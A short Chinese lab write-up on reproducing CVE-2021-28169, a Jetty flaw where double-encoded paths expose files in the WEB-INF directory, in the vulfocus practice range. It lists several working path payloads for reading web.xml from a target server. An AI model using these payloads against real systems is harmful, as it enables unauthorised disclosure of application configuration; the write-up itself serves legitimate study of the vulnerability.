vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload:

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问:

对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml

相关推荐
大神157321 天前
Jetty 6 HTTPS 配置指南
网络协议·https·jetty
带刺的坐椅1 个月前
Solon Server 启动模式深度解析:从 0.3MB 内核到 10+ Server 插件
java·http·solon·jetty·undertow
代码漫谈2 个月前
Jetty vs Tomcat:Spring Boot应用场景最佳选择
spring boot·tomcat·jetty
天码-行空2 个月前
深入拆解 Jetty & Tomcat:Connector 架构差异与设计精髓
架构·tomcat·jetty
SuperherRo2 个月前
服务攻防-中间件安全&Apache&Tomcat&Jetty&Weblogic&AJP协议&反序列化&CVE漏洞
中间件·tomcat·apache·jetty·weblogic
devilnumber2 个月前
java的NIO框架Netty、Mina、Grizzly 和 Jetty 四种对比
java·nio·java面试·jetty
花千树-0103 个月前
兼容 ThreadLocal 的用户上下文透传方案:WebFlux 项目改造实践
java·spring boot·servlet·jetty
希望永不加班3 个月前
SpringBoot 内置服务器(Tomcat/Jetty/Undertow)切换
服务器·spring boot·后端·tomcat·jetty
康小庄4 个月前
Java阻塞队列——用法及常用场景
java·开发语言·数据库·spring boot·spring·jetty
lang201509285 个月前
Jetty密码混淆工具:安全还是假象?
安全·jetty